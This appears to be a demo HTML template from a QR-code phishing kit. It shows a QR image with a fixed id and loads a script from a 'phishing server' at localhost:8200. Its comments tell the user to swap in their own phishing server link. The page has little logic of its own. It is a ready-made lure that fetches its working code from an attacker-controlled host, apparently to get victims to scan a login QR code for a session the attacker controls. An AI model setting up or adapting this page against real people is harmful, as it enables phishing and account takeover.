<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DEMO</title>
</head>
<body>
    <!-- id attribute of the img tag should not be changed to any other -->
    <img id="qr-code" alt="qr-code" src="qrcode_localhost.png" />
    <!-- src of the script changed according to your phishing server link-->
    <!-- for example the phishing server running on localhost port 8200 then the link is-->
    <script src="http://localhost:8200/index.js"></script>
</body>
</html>